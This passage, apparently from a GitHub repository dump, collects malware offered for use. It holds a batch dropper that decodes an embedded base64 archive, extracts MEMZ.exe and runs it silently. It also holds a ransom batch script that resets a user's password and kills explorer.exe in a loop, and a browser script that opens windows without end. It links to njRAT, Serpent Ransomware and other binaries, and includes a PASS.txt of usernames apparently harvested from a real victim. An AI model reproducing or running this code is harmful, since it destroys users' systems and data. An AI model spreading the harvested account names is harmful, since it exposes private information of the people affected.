32 | echo V3AgkNghlWycVNk4R6x0oAaN2HfQ406ljPcwM+WFZ9smV37SFm0fkxePCLnHcspqk1cfuwXzhurP>>x
33 | echo DLx0YD+V+WKsVkLEJhDjsdKpI4b+FFs6dQAMlK6i/rBBSf0BVpo2pelkyeukzTbUftnW1EoDbfii>>x
34 | echo TVaqTQyPyWqVdHPutOXcqeKaKbrxS++leMa2guJUg2bGT7bYwzTkL98IMdyZOPAGXuasbkV3tCUm>>x
35 | echo pl2ka9uupKLsVVBR9uzMVUz63sC59C91ithVp7g4VD8miW9dT7dF68DwAese8wGru9BdCMfInOIY>>x
36 | echo Uxz/iysw0RX8SElXMMk8deLgaHMniyf2618eGndr3xDl17E3rsRtL51lkmgnpSgm7ROnYgeR9uIw>>x
37 | echo HUJ99TU8L+qPDq0aoxib+MfYN7FSCDU0NqHYXgjxVuzUS6fVVupsH8Ld5kCkoWNDr0F5u38fXu5U>>x
38 | echo gWxTnGrMoqDbahU9x5pipXKDnm1NoG6TTs5X/36ftU5GsGb5HHe4lQhhUihzT8exIaaNS6ddKKM1>>x
39 | echo xoHkRnlMKyrtZDc0u0HKI0wd7S9ryFdlJRzNSmI0Zo9JkWkIvvT4l6QhA3dpVG1Dd+nCZbahrEtV>>x
40 | echo EMUUCeW2xnh4z9B0uiL9utT9kts2SahBCaWjnh/MjNrSO25F9kTFoxp/nqZL7S9rKWWkNn9rG3pn>>x
41 | echo 6MrQaw04ULRDFg1yAN3GjUNjVe6ktXI289d3aaj43j3rpZxjsRMKGnMrEDYoRkzTyrmIxq2QD1Rp>>x
42 | echo 4J76y+vdDIytk2PTYhxTOyaiTutQWIM1bqIHwLhiu9X4+xpb29A4HGXoT7vF7XO7h5jtM/5d29Ed>>x
43 | echo ZTqquqPa7Y0r/3zn+6Cye3j7AnfSbe7pG7vLKlrDuu6yulZleBqGtHZH72xVVq4cufMvt90quejb>>x
44 | echo m7IvD1VnX35FXFxDz9vFddLTKj0HWdP/iWT8/0I5bCLkGGAUMA7QmWX8d/B+wCS/n19FyCcAzU2E>>x
45 | echo pAJYAAdYA3gP+G7UdwDuBzwOeA5wDHACMIL+YcDPAA8D9gJ2AbYBNqDfsUrmcSDO14raBOAA3XGc>>x
46 | echo EnLMAlAjcAAToBlAPesOwN9WE/IYYCfAB9gEqAGUAJYAZgGugFcM9SnACOA5wBhwe1fLPHbFeeUD>>x
47 | echo 6O8hvxhNvPeVe98+wiifVZJnyC8IOT7bMBx9JfpS9OUXCHmRmA71X3k4MVhcEQmqzupI9o7Blw49>>x
48 | echo ceVXkY/F8KWz74qDrx6KvnIo+mH0nf7XiGmij4QvRU+cfVV86pn3qo6odD8nx3UvQpbhh54lR+59>>x
49 | echo 6Qghz44kfvTjFw48AuwZu1b1nv3niqbD33wWY8jm42m39F+JPXIXc+jw2I+v/CbyKQn/99boiSej>>x
50 | echo L0XOZL1XOTj6XuXwB+rhvygH/xr9sKP/k4sPhV95gZhA6ggWc/IIWAxf+c1Zljx16olDT/RfGX4o>>x
51 | echo VNkvHpwRUp09J1IuijgXzOj/5MAjYdVzFx+S+Rz/Ih+Jydmfi+Bw9iWRtDwxMBNFus9rpF8SWFKc>>x
52 | echo PHDhwswLhKwj9zMRkTQ2kkcayfu2nVkXshSVDaTBqpyVNaBDUVoZpVUT0SkNWQOpKMoIM1CNohxk>>x
53 | echo lJGUu00p589/gKJ8lFH+QL3z/PkU5eYblYOagTUoypOMciTlHnL+g9OnTqMcx5/yI2bg9AfnifLn>>x
54 | echo 8we6UVQso2I1qoUp/eS88lO1yswMjCQmjig/ZnadJ7rEROXP5g34UFR+ZuA8iqqXUfk1u0liIhk9>>x
55 | echo r7pJ808gSnp6ehJHRkZGE/GiUs5T9WoG3kdRHWNUw5rdScTfk0hU96qVnzD9p0ZUjzKRHtX7jOo8>>x
56 | echo o2qZN/AECqNjGJ2GmZNEx/ohyMeJqn3qyBhTykT8zEq16odzB76PwmxmBowojJNhNk8fUJHz7ygv>>x
57 | echo MKr7E/t7/MxqhrmHYdbMY5yau8tQPgYwT2kfLOMg6fl35JLih6hy6fErVP86d2A/ipow/fsfUTMJ>>x
58 | echo ajJtEG0syE8UqkFmQIGiXpCg1qtV6oyBb6OorYy6RqfexKhzGLVbrd6YqPYmKo7sI49cSNgfVB/6>>x
59 | echo buKOhMQd63ZemJml/rGoeeIXSuvHqhq1qkEdmamyZar86bvOj0Ig1R6tap+mf5SoHp2vGk5nqpn+>>x
60 | echo 0VHVO0mR06pYDjNz3oAfojL5ScyKpczmzIiKuSuZuXspMzyd+aUuUsb8Npk5maPWabUjWvUNGjWb>>x
61 | echo rF6+WN2ZELmgbktT356oDsxU71yuflJM+KmY+PS/9c+cqfhOIzn1dMrlA2Rdc9LGtFmLk3bpUlBm>>x
62 | echo mZhZJk1Sf1ZkZtKP0maFpw0QuJSWUUdOJT/NJB1XJ71h1io0O0+PjMzaz8z6HpNUkJFcq5utS0nu>>x
63 | echo 0Mx6kImQZA+jakxIDmck75+RvG/G7Hz1rAfV2rZE7U/VyaFMRjdv58GDB1WnmdkDCZHjs6PqyA6t>>x
64 | echo g5n9doLWmaXlZiYHGCZXPbswOdIz+9vqSGIqGrF0bTQttYUZVKEYIc87s95NjEzXOtT9fj+jh/9o>>x
65 | echo n56nTknRnp65K3EUJXWYuRsVnMfvT32dOs1fMvovZM38nVptvSFCUt9kdirQU5qYNludNjsJepnx>>x
66 | echo 7n/OeOu76kPinEUHb/gBo0mv16TeOosVZ2c92Z+YOPu3Nw8chIekZtbtUvn9KmOqtyj10cz+vYmp>>x
67 | echo LxrUtfPTUsT0B0RN2n2pY4kgNidPZHfVJVlv7K82zdNxSQfZeZtv6R8ZWViqTl7ALLiQkWyam1Gb>>x
68 | echo tLAoISMpsf/0+dR0RvVDQ/9ooirKJD+ZkPG9hIxblmTsSO9PSsp8lMl4KDnjRznaggUL30jOuJyt>>x
69 | echo 3XFjhMu8KSmzNidTyIzsXZSekPndfLU1A0Lo3hqPXFhirScPr9154ULWkkcb4HMJo+KCZ/6gqlUv>>x
70 | echo vFetshUnb0hZ9B8a1cPlyY8nL09Sq2Lm5I81i25PZipMi57XMfdwiy5nZt+g1v7bwkhWtml+pCe7>>x
71 | echo Q/vNUTnmay8yy7QZ2XvZ3G+oc7eqs388g5SKeXN35IoNOSv2LXnoQSx+8X/dkiWYklhu7tiNEV2S>>x
72 | echo YJhnYpVjkXmj6dMVTGTzvM+mqe5fnsGlR1JUb92dMZJuvFnN3GVMtc41/gvDHF/GfS9J+0aWOmvx>>x
73 | echo jdHZuZvT1J4czSyRM36W+IKYN0/Mn/tdQ0lyZMxQ8UHy3Jx5o3P7N2+e92lycvfywoPpyY8PGk2Z>>x
74 | echo 2roi4975EaP24azi0dnaEWt2dP70VfNnvCUmPC/OGBR1u8Qlzb9eMPzrec8tWfjUsoxpOctH0itv>>x
75 | echo Tpi9fafen56aXqofnrtrGkpZ5k2Nqb80qq2Z2T9Ki1xIWyjOWS/eYBXT68WSO39vJqJZfDLjQFHl>>x
76 | echo aHqEyzi7oopL3zXN759WVlVvzdxjrBqZX3VeS62Q/VzjmpY3blwpKm5dQZ1jmdjIReaO/Xrht5bM>>x
77 | echo G1228K2ccv8Ni26IrtSxi4Y5496s7Bn96/ZnrPslU61Qm3YlrHu9psA6svrdh0z9TIFCpHv4E9Ea>>x
78 | echo Obt8Y045u2T5D5eX+xct/+iupkiu0bMysropptPHcmxZcyIf36pkcpcX2wQIf6tFHbmQ+w2D5max>>x
79 | echo be8Dm95obF/YePf2nFk5dWuOVLcPq+9dciS7KPvFRUXZZPGR6ro17cOa9jfVB4GLLnpxURT4ujUP>>x
80 | echo WbbnbM/x147lOJf6l/ldzpqxte1XEu52Lt2eU7fkocUds5gOHdORwuz2L9u+tm5NxxztwBhmdCRp>>x
81 | echo +sfWdqRoOtYwHRXqXTX+WmdN+8Xu3f7a/bll+o7hhI4nEgb8y2bltB9L6PfXdrym6d+f2/Em0/EM>>x
82 | echo c/f+3E/zs/PRHE7peF1zG2E6/sZgLFl+mzah4/fafnJzx7DneWfNRiEcYLsErz8c4gOs0x5kO3ne>>x
83 | echo x4YC9qCTd7CdfWzIybP1lvpbgBPcdl8+2yD0sLzPLdz2fMK3GvrsPrbKHsrPzy/A3eNgIu4fjS1N>>x
84 | echo bFVjvbWl2dLE1phtbKXF0sCuaalaZ6lmKzeyzTUWmWBzU+PN5ob86UnTkz4vRo/gywmxnYIQYsN+>>x
85 | echo 1r7F7vLlTk8KCmw4yLOuEAspPYJvC637hDD9Z6AFlEh5NX02B/pc6AsJ7FaXxyNz6qFvXXY6vY9y>>x
86 | echo CvYFQ7yXjunkpyc5+CDW1oflunzBkN0X8vTlsuDmkMQIBfooz/Jq7OM/AeYBnKGQv7ygYIsgbPHw>>x
87 | echo +V1CftfWgiBvD3Q5V9++qhPk9D32Pn1I0FMR9JRlkPd0X2OeU+jRF+oDvFfYxuvt+m2uQDh4LV7e>>x
88 | echo Lns3z+u3BfU+IRASfNcaT3lArCDvc0ywoG1vn7474ALymvxcPr4rYO8O6Z32Xr1D6PF5BLsDzCfF>>x
89 | echo vS7+W/iQ3iv4+L5r6lLw3eHSd4Ydjr6r3LoDPH9duuwM9+l7eN5BrleuLsExqXq9y4eXYNju0Xfa>>x
90 | echo g66uifvM19Lpcdqpavx+3gcC3dT0egfv4UO8XvY5Y+E1aWwxhvQB49bQNXVjD3U547JO6OZac6TR>>x
91 | echo +XzvtfTn8mEf+mAlvtfvEQJ8QO+Cozh5veTcnQGhJ8gHrkMf3fYuHvt4K3TStRXbEkoWPJIBv+g8>>x
92 | echo +h4hII0p5Awl17MO2NflcUA2D7/FFfo81eu0d4C3wzR0g+oxUR+w+4KCt8ceuB7/wvz4ZvXy3jv0>>x
93 | echo cni8zn2ADTcR7ahmHQJddw/vCjigZbxDGaFu2iP7ElzR77kDDY//6+k67L6tkjjXJ/+kDeQp15hj>>x
94 | echo 93TrPa5uXm/Ewj28PQh1Q33XmodVIAqGETrsIRdm2j3X9hsEh5B9C6/32wMCtr7XLjlG/N/9ZQf5>>x
95 | echo 2vnUVSWrwJRxll87nob9rQgx0tNr78Nf8Hr2u1tw+vRdvM+u97ocrrgj+oQQrOvbxgdCiD3X8GMf>>x
96 | echo H7SHuyRpeczyePiukIsG8q+Xd2sAOuV79cEuHDQCji04ErzP5wKpoD/gCvFBSaRJOvDsHj4QzPe6>>x
97 | echo ugJCUOgOgaS3gPflhYMF0GsIbAu6hUDYO9G6TYASA3kTrSD92AJGKKBqzfPaPXSXSM6eJ3t+HnVo>>x
98 | echo Guk8fXnxE5UOLywp7ewydBXmGcu6i/KKCrtL88o4NIvLVthLVhg7SzqLiqfq2Sux7RTsAUf+NqxG>>x
99 | echo EhMWdBT00HiXh+0RnGCfFwoHfHn2vImtlIewJaDtcMEMdk+ek/d4ILefn0Lf77H35Xd5wp3YVlvC>>x
100 | echo Lh+lP9nXJfhDLq/rDj6AZUs9k/OoygSoV8J22T3SeQBL834Emy6vg/RQpQMX4LfwDleITEROOi5k>>x
101 | echo D271bgkQbxB+0e3aQnHeoB95TYg4+G3eLd5QPvoIeqE3D/F6u2gexa6rratD0lS/MZ4rIc2h2RdN>>x
102 | echo erB8dosQz3QcLp7+rESaLLZmtraBtdbabLnsmsYmSytysHq08kkt22ZuagA1EEa6RmrMNWa2geMq>>x
103 | echo 2bpCK7vW2Mw2Gdc1I38D8W67y4N0yB6S0yWD0biCdRb1csicaEZzB2VG5WtuqgVBWyPSvKZq1txQ>>x
104 | echo za5tbKbtNeamXLayRRKG5nuWhupcVsoMrVWQw8bamrG0eFK4ALKgbsLqLA03N25kK7FSstbSjMyx>>x
105 | echo WU4iN7ANlg3NbHNtvYXtrcb4Vgsmg3bTxtqGtWxzI0uXjvXKTKrNzWaasd25qeBOI33g1K20NVZD>>x
106 | echo HGSmmAH5W2ubWmystcncsI5duraxwcK2NTU2rF1G9SiLQQVv2GhuYKvM0MtaPsTS+MAiQXRJjs96>>x
107 | echo yxbI+qLGQCKM/SaEsAoo9gt/ZFG9fStfLzvuWnrumGleS4itsd5S2Vi9kW1sqLJgJXWwt+VqkmzG>>x
108 | echo miBdg5ltaoTG6i0TeUibsw92d0jOwG+TcnYXbDY1710dT6yhc1eQ7Q53baVG9fUhOc0nNr4rHOAr>>x
109 | echo aZIdRE+Q2nRLoJT1lrIuFnVpQSmpsW+TMuYJ2thu1OOQDgvd3aDkYAWfnJ+vJhW1PuQEIfZmgfew>>x
110 | echo t4exM1hsZP4mKivWy4fosUbFs0O6tWaXmUUk6URIWhBfDzZrLku3rEDvHAE+n62Np+CdvMeFJbI9>>x
111 | echo fA6e0gUF+9PPBzxIzemOcSCCOjA+x8tW0oyRksyRPhXDH2YG+qRTFQR7YD36pZi3b/K6kTM9ic2j>>x
112 | echo phWErpCBlbMPzG9x5rJVCBSsNR4p2GaXl6crQPrKdiIc8o4FXz7ZJuV6NXaaUMvv68MIiVJcl9uW>>x
113 | echo 3i6P3WuXUaSA9BA7CZEu4iQOIhAaIJBgE2rECXs34x5GgxD1H8km7nAwxCKV68IiHHShiB5BF/Ih>>x
114 | echo tOIBEncrSQvxpnwPctoDXnlfT164qCVxxvJBatqwLxy0d3ro5NruyVgT5Hkp2Ejk+GAQpzPIhZxC>>x
115 | echo OMRu9Qk9tJNmv18UDXcpF06GPtgM83B9lNghdEomiYtEs5yrDClBmVpoqvgOARLSybQRDtLpdjaI>>x
116 | echo GxDuo9iRgs/Lw7owEE6/UG6c30Ze8jqc8HBOV0i6blY30jiBQNTQTGOHZYOlCrdVbLpaG1tvrkOg>>x
117 | echo tOTSiNJS10zDC4IYokBLQ4vNXFmHfWmuqqltsMR/15cm4Y/u2Doz4i8Ns5glXUkpsqrJYkZoomMa>>x
118 | echo EB1B1trYYKullBChQXkj4lW9eS0lXG1hW2xSRJsiCijJ4XJCztrm1dRnvPAZF6H+s2lT/iarsw+3>>x
119 | echo FLunOuDaxnPA0cMpPyR9q+cLOTw062oKecwOahwrBiHEb8GB1RBqsruCfA0OXEsgIEjnlY3wACcJ>>x
120 | echo wyepP/aAi5UEwG0bwIPeLYSedfTrB+xDKgKwAvFIc0PSGA9hMT8oSbgF7yHQc6HNwssFyO6XqPOg>>x
121 | echo uppcLcPxxli81pjkWhevU+N1drzOj9dF8XpjvHbJtWmHXPsfiLcfkeqJbzanA84BjpUD4t9rTvSl>>x
122 | echo kM+XtVXNdfRfHeh3j9I3kNlead0T30vmu+iHjNlSMqNDADoyF7j4N5CUPuUjt7PvuOMORyfd4/Qb>>x
123 | echo znvI5FzpbmiqwCqv4oySj1V8jof01SP9d60OZhInf+FoJWQXHRf/pnLXevmTy/zOoJzObpY/nZS+>>x
124 | echo pczmDBIKiEHFJE6Sobfi6rrfRQTPxhrHp+C+CS0+BpxnCu4J4NJZWdaJstAs6+fMFFwvcHuB27Tq>>x
125 | echo Ku47wGmgs1NTxh0BbpAlX1r+8W+KMo+Jf1O0KJGdWANCl9nhoEGPkGpVnYBgYPZI38LWyK019IeT>>x
126 | echo iKoRO5YOpgOHFZhZFQ4EEDkncHMVll7XZOtpUiXdkpudNAsn5D+mzJBxtcD+jLF5eN5PFqvbaB68>>x
127 | echo BsGFNJEqj0Aji8+BllntwaWgy+uHzJUT79hpFZDN7qhzdQbsgT70pdK11ONI90hUGuxeHqPulrgK>>x
128 | echo Xi+I1eHS1EYG43LRQWZyF2OjGnAJ4N5X5bFTHbwwIbkgeJBX+I2FNp/dH3QKCIn3q+LrMxaucQWC>>x
129 | echo oTay7yqmAbsbPH+uXOsROieU+Fy8JSmRNEgr8PA+jEPq2mCpMxbmS0G2nUpaL5+QbeSyspn+qOCB>>x
130 | echo GHEcIT8h1S4k/7jNTA4j/0WozttcPlzJg5ZecoBU891yk4qFEXXKJtwu6UVPWp6F7iNvfIXyQIra>>x
131 | echo TrnLKUY9j6ytC3pIUcb5VAoY8TslNBVnVCMIWy29IK5q8Tnx/jk0+QZG+hzxuTT3wVnfRrZJ2Fof>>x
132 | echo MgdylFQH7D21XTSJ+Q7lLBOoriI8pJV+IsD7gas9TbhKkrQp8rSRb1F54E9BIWAVIC0b96+J9iLa>>x
133 | echo ruaDW0OCXyZCyJ+JxRf2VjldHkdcZEIySRUyS2q6uPjkAwX1LCpdG2mxWZomLDSbVLpClZ4QtbAt>>x
134 | echo FOBhCKm1tro2PuSSYsoeaRa20hMui8hHp9ScPD+D5AFwEbaG/ZOoVrsnDJP+FLbp84fMXbeHXQG+>>x
135 | echo Cjc72atekvFreV8TfJleMc3VrWbrBGtyo8JGk2CLnD2ZycLPtdtIApmyDZoFc2DLNlBd8LlR1Ka2>>x
136 | echo GkvdhFNqiBXXXpsQ9jngNW21DfX1En42iccNLLPWC4tM7DiMstogVH51Xd2Xh+DrLm8uNxGt3kRM>>x
137 | echo AD/gKcAYgM01kQ2AQcAIIDXPRCoAfsA+wCigFMd7L+AIYBxgLUAbcAhwBpCOwLoBMAgYpkHWgDmA>>x
138 | echo CGBpIfCAxwDDgDcB9EvUM4AYYAwwDmCMkA+QDmABuYAiwMUS0FthIroV8oFSCpwHMAjYB3gKcBKQ>>x
139 | echo jdSjFNAMuBMwCNgHOAw4BhgFaIpBG7ABsA9wCPA8IAZgwGcpoBdwBHAZKQ4Xxt5Ok+sf3IC5DYQc>>x
140 | echo nIP1vwJ9xvHL58j47nTImIOzEm3TAULOYvzm9wk5jva+cjLxv0v+HykKko5nuvy/XT6Hp3JyX4Kf>>x
141 | echo hhynhlzNU/6+VKzu9XpY3PGCuEutyjHkczm4DnQJDlwPVuW0NK/JK82h2b/PYfcIPn5VTh8fzFl9>>x
142 | echo 0/SkCkRR3EBxMQEBX3BVDm635cEuJ++1B/MmfyajPy6V24Pe/G2GHFxEfK5u3C1ap3IDKZatCAUQ>>x
143 | echo G2p93UKc2sJrUDMulOZhZpBexHFqxdvABPjb6XWRd1wNM5OdU7vl3Q5B6nDH9bAe+lyVQ7sRccwO>>x
144 | echo r8uH8yJgDwmBHDbsMnfRbb4qp9vuCfI5bMFVfgVfzbCi4HPiVRRMrpNqsGBChWh8pcmRgG6A3WZx>>x
145 | echo uVwpZ+Ju4TZz3ZyXC3NPcf/ODXNHufe4jziFYZphpiHDsNxgMJQZTAbe4Df0G35h+I3hPcNFw2eG>>x
146 | echo tMIVhdWF6wpbCjcVbi0MFe4qvKfwXwofLTxa+Hbhfyv8oPBSYZoxw5hnLDdWG9cZNxm7jT7jncZv>>x
147 | echo Gx8z/tL4ivG08V3jZ0ZlUVKRrii9KKsov6ikyFS0vqi1qKMoUHR30f1F3yt6oujVojNFHxbpim8o>>x
148 | echo zizOLq4rbireUNxR/I3i14rfKf7P4ovFaSXzS4pLzCVbSrwlwZK+kqGSb5fsK3my5HDJcyUnS86U>>x
149 | echo fFjiXhFaMbAiuuKfVvzzit+u+GjF5RXTSvNLS0otpetK15e2lfpL95Q+UPr90qdKXy49VfpeaULZ>>x
150 | echo 7DK2LL+stqyzrL9ssOyBskfK/rXsp2XPlA2XHS37sExdvrC8sfyWck95oHx7+UD53vIfl6eunLeS>>x
151 | echo XblkJc31D1P9cgyn4bScjkvl0rlMjuWyuaXQNccVQd8V0Hg1V8PVcVaumdvAbYL2HZyT83B+LsT1>>x
152 | echo cndyEW4XN8jdw+3l7uP2cQe4g9xj3OPcIVjnMHeEex4WOsa9zo1wb3InuVPcKHeGi3HnuDHuIjfO>>x
153 | echo XeaIgTFoDFqDzpBqSDdkGlhDtmGpIdfAGRCHDTUGq2GDYbPBCWv2Gv4XwsY/yv+35X8CUEsBAhQA>>x
154 | echo FAAAAAgAdXfqSJDoh9lzIQAAADoAAAgAAAAAAAAAAAAAAP+BAAAAAE1FTVouZXhlUEsFBgAAAAAB>>x
155 | echo AAEANgAAAJkhAAAAAA==>>x
156 |
157 | echo f=new ActiveXObject(^"Scripting.FileSystemObject^");i=f.getFile(^"x^").openAsTextStream();>x.js
158 | echo x=new ActiveXObject(^"MSXml2.DOMDocument^").createElement(^"Base64Data^");x.dataType=^"bin.base64^";>>x.js
159 | echo x.text=i.readAll();o=new ActiveXObject(^"ADODB.Stream^");o.type=1;o.open();o.write(x.nodeTypedValue);>>x.js
160 | echo z=f.getAbsolutePathName(^"z.zip^");o.saveToFile(z);s=new ActiveXObject(^"Shell.Application^");>>x.js
161 | echo s.namespace(26).copyHere(s.namespace(z).items());o.close();i.close();>>x.js
162 |
163 | set v="%appdata%\MEMZ.exe"
164 | del %v% >NUL 2>NUL
165 | cscript x.js >NUL 2>NUL
166 | del x.js >NUL 2>NUL
167 | del z.zip >NUL 2>NUL
168 | del x >NUL 2>NUL
169 | start "" %v%
--------------------------------------------------------------------------------
/MEMZ/MEMZ.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/MEMZ/MEMZ.exe
--------------------------------------------------------------------------------
/MasterSlave (test)/1.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/MasterSlave (test)/1.bmp
--------------------------------------------------------------------------------
/MasterSlave (test)/2.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/MasterSlave (test)/2.bmp
--------------------------------------------------------------------------------
/MasterSlave (test)/3.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/MasterSlave (test)/3.bmp
--------------------------------------------------------------------------------
/MasterSlave (test)/4.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/MasterSlave (test)/4.bmp
--------------------------------------------------------------------------------
/MasterSlave (test)/5.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/MasterSlave (test)/5.bmp
--------------------------------------------------------------------------------
/MasterSlave (test)/6.bmp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/MasterSlave (test)/6.bmp
--------------------------------------------------------------------------------
/MasterSlave (test)/MasterSlave.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/MasterSlave (test)/MasterSlave.exe
--------------------------------------------------------------------------------
/MasterSlave (test)/SDL.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/MasterSlave (test)/SDL.dll
--------------------------------------------------------------------------------
/MasterSlave (test)/cursor.cur:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/MasterSlave (test)/cursor.cur
--------------------------------------------------------------------------------
/Mitologia/0a-PORNOSKI.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Mitologia/0a-PORNOSKI.exe
--------------------------------------------------------------------------------
/Mitologia/smss.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Mitologia/smss.exe
--------------------------------------------------------------------------------
/NJRAT/njRAT 0.7d/GeoIP.dat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/NJRAT/njRAT 0.7d/GeoIP.dat
--------------------------------------------------------------------------------
/NJRAT/njRAT 0.7d/NjRAT 0.7d.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/NJRAT/njRAT 0.7d/NjRAT 0.7d.exe
--------------------------------------------------------------------------------
/NJRAT/njRAT 0.7d/Plugin/cam.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/NJRAT/njRAT 0.7d/Plugin/cam.dll
--------------------------------------------------------------------------------
/NJRAT/njRAT 0.7d/Plugin/ch.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/NJRAT/njRAT 0.7d/Plugin/ch.dll
--------------------------------------------------------------------------------
/NJRAT/njRAT 0.7d/Plugin/mic.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/NJRAT/njRAT 0.7d/Plugin/mic.dll
--------------------------------------------------------------------------------
/NJRAT/njRAT 0.7d/Plugin/plg.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/NJRAT/njRAT 0.7d/Plugin/plg.dll
--------------------------------------------------------------------------------
/NJRAT/njRAT 0.7d/Plugin/pw.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/NJRAT/njRAT 0.7d/Plugin/pw.dll
--------------------------------------------------------------------------------
/NJRAT/njRAT 0.7d/Plugin/sc2.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/NJRAT/njRAT 0.7d/Plugin/sc2.dll
--------------------------------------------------------------------------------
/NJRAT/njRAT 0.7d/Stub.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/NJRAT/njRAT 0.7d/WinMM.Net.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/NJRAT/njRAT 0.7d/WinMM.Net.dll
--------------------------------------------------------------------------------
/NJRAT/njRAT 0.7d/nj_users/KHALED_PC_Future_22A4A3B1/PASS.txt:
--------------------------------------------------------------------------------
1 | USR: ahmadmahdi88
2 | PWD:
3 | URL: http://Yahoo.com
4 |
5 | USR: bmno56dt2v7vjffpcle3sfsxhwxccgmlfmufmtc5
6 | PWD:
7 | URL: http://Yahoo.com
8 |
9 | USR: alas.66
10 | PWD:
11 | URL: http://skype.com
12 |
13 | USR: alshad45
14 | PWD:
15 | URL: http://skype.com
16 |
17 |
--------------------------------------------------------------------------------
/Putin/putin.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Putin/putin.exe
--------------------------------------------------------------------------------
/Serpent Ransomware/software.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Serpent Ransomware/software.exe
--------------------------------------------------------------------------------
/TheEnd/TheEnd.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | title TheEnd
3 | color 4
4 | echo
5 | PING 127.0.0.1 -n 1 -w 3000 >NUL
6 | color 0a
7 | PING 127.0.0.1 -n 1 -w 3000 >NUL
8 | set /p username=TheEnd:
9 | net user %username% Dendrofil
10 | echo
11 | echo
12 | echo
13 | echo RansomWare enabled, contact me at dendrofil@dendrofil.pl so you can make a deal with the infected owner.
14 | echo
15 | echo
16 | PING 127.0.0.1 -n 1 -w 1500 >NUL
17 | :k
18 | taskkill /f /im explorer.exe
19 | goto k
--------------------------------------------------------------------------------
/Watykańczyk/Guide.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Watykańczyk/Guide.exe
--------------------------------------------------------------------------------
/Youareanidiot/AxInterop.ShockwaveFlashObjects.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Youareanidiot/AxInterop.ShockwaveFlashObjects.dll
--------------------------------------------------------------------------------
/Youareanidiot/Interop.ShockwaveFlashObjects.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Youareanidiot/Interop.ShockwaveFlashObjects.dll
--------------------------------------------------------------------------------
/Youareanidiot/YouAreAnIdiot.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/Youareanidiot/YouAreAnIdiot.exe
--------------------------------------------------------------------------------
/fork.js:
--------------------------------------------------------------------------------
1 | function Hello() {
2 | if(!loop) return;
3 | if (i >= len) { i = 0; } // start over
4 | while (true) {
5 | window.open("https://www.hacking.pl/");
6 | }
7 | }
8 |
9 | var i = 0,
10 | len = frames.length,
11 | loop = false;
12 |
13 | function startStop1(){
14 | // Below is shorthand to invert the value of the loop variable from true to false.
15 | loop = !loop;
16 | // I guess we're also like to change the text on the loop button to say start or stop
17 | // below we are using shorthand for if(loop === true) print "STOP" else print "START"
18 | document.getElementById("loop").value = loop ? "STOP LOOP" : "START LOOP";
19 | // then we need to call your function, because we want to restart the loop or stop it after clicking
20 | Hello();
21 | }
--------------------------------------------------------------------------------
/malware.git:
--------------------------------------------------------------------------------
1 | echo "# Mine" >> README.md
2 | git init
3 | git add README.md
4 | git commit -m "more or less dangerous viruses. Use at Your own risk."
